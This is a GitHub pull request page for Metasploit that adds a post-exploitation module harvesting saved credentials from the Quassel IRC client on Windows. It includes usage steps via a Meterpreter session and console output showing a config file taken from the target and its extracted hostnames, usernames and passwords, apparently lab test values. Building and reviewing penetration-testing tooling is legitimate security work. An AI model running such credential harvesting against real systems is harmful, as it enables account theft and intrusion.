Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add Quassel IRC PackRat module #19166

Merged
7 commits merged into from May 17, 2024
Merged

Add Quassel IRC PackRat module #19166

7 commits merged into from May 17, 2024

Conversation

The-Pink-Panther
Copy link
Contributor

As A part of my final year project at Leeds Beckett University, I have developed several post-exploitation modules utilising the existing PackRat framework built by former LBU students. This PR will add a new /post/windows/gather/credentials module for the Quassel IRC Client. https://quassel-irc.org/downloads

This pull request will add two files:

  1. modules/post/windows/gather/credentials/quassel_irc.rb
  2. documentation/modules/post/windows/gather/credentials/quassel_irc.md

Verification

  1. Start msfconsole
  2. Get a Meterpreter session on a Windows system
  3. use post/windows/gather/credentials/quassel_irc
  4. Set SESSION 1
  5. run

Scenario

Using Quassel Client v0.14.0 running on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045

msf6 post(windows/gather/credentials/quassel_irc) > run

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Quassel irc's Quasselclient.ini file found
[*] Downloading C:\Users\test\AppData\Roaming\quassel-irc.org\quasselclient.ini
[*] Quassel irc Quasselclient.ini downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240507163717_default_10.0.0.2_QuasselIRCquass_570372.ini

[+] 1\HostName=10.245.100.2
[+] 2\HostName=10.0.0.3
[+] 1\Port=4242
[+] 2\Port=1234
[+] 1\AccountName=Test
[+] 2\AccountName=Test#2
[+] 1\Password=tiaspbiqe2r
[+] 2\Password=tiaspbiqe2r
[+] 1\ProxyHostName=localhost
[+] 2\ProxyHostName=
[+] 1\ProxyPort=8080
[+] 2\ProxyPort=8080
[+] 1\ProxyUser=test
[+] 2\ProxyUser=
[+] 1\ProxyPassword=tiaspbiqe2r
[+] 2\ProxyPassword=
[+] File with data saved:  /home/kali/.msf4/loot/20240507163717_default_10.0.0.2_EXTRACTIONquasse_134569.ini
[*] PackRat credential sweep Completed
[*] Post module execution completed

@The-Pink-Panther The-Pink-Panther marked this pull request as ready for review May 7, 2024 21:16
@bwatters-r7 bwatters-r7 self-assigned this May 15, 2024
@bwatters-r7
Copy link
Contributor 

msf6 post(windows/gather/credentials/quassel_irc) > show options

Module options (post/windows/gather/credentials/quassel_irc):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   ARTIFACTS     All              no        Type of artifacts to collect (Accepted: All, bookmarks)
   EXTRACT_DATA  true             no        Extract data and stores in a separate file
   SESSION       1                yes       The session to run this module on
   STORE_LOOT    true             no        Store artifacts into loot database


View the full module info with the info, or info -d command.

msf6 post(windows/gather/credentials/quassel_irc) > run

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Starting Packrat...
[*] Quassel irc's base folder found
[*] Found the folder containing specified artifact for quasselclient.ini.
[*] Quassel irc's Quasselclient.ini file found
[*] Processing C:\Users\msfuser\AppData\Roaming\quassel-irc.org
[*] Downloading C:\Users\msfuser\AppData\Roaming\quassel-irc.org\quasselclient.ini
[*] Quassel irc Quasselclient.ini downloaded
[+] File saved to:  /home/tmoose/.msf4/loot/20240516152323_default_10.5.134.167_QuasselIRCquass_262576.ini

[+] File with data saved:  /home/tmoose/.msf4/loot/20240516152324_default_10.5.134.167_EXTRACTIONquasse_906815.ini
[*] PackRat credential sweep Completed
[*] Post module execution completed
msf6 post(windows/gather/credentials/quassel_irc) >

-Pink-Panther and others added 7 commits May 16, 2024 19:12
@bwatters-r7
Added post module for Quassel IRC Client
cf15b1f
@bwatters-r7
Re-arranged Author list
d082477
@bwatters-r7
Added module documentation
4164307
@The-Pink-Panther @cgranleese-r7 @bwatters-r7
Fixed documentation formatting
7d8cd04 
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
@The-Pink-Panther @cgranleese-r7 @bwatters-r7
Fixed rouge space
698895c 
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
@The-Pink-Panther @cgranleese-r7 @bwatters-r7
Removed unused regex search
6de0048 
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
@The-Pink-Panther @bwatters-r7
Added Quassel IRC and Windows version to documentation scenarios
c8ce9dc
@bwatters-r7 bwatters-r7 closed this pull request by merging all changes into rapid7:master in d097ccf May 17, 2024
@bwatters-r7
Copy link
Contributor

I had to do a quick rebase because there was a merge conflict for the renamed document.

@bwatters-r7
Copy link
Contributor

Release Notes

This adds a gather module leveraging Packrat targeting Quassel IRC client.

@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label May 17, 2024
@bwatters-r7
Copy link
Contributor

FWIW, this appears to have failed sanity testing. I assume that this is due to a infrastructure issue, as sanity tests are passing on master fine, now. 🤷

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@cgranleese-r7 cgranleese-r7 cgranleese-r7 left review comments

Assignees

@bwatters-r7 bwatters-r7

Labels
rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@The-Pink-Panther @bwatters-r7 @cgranleese-r7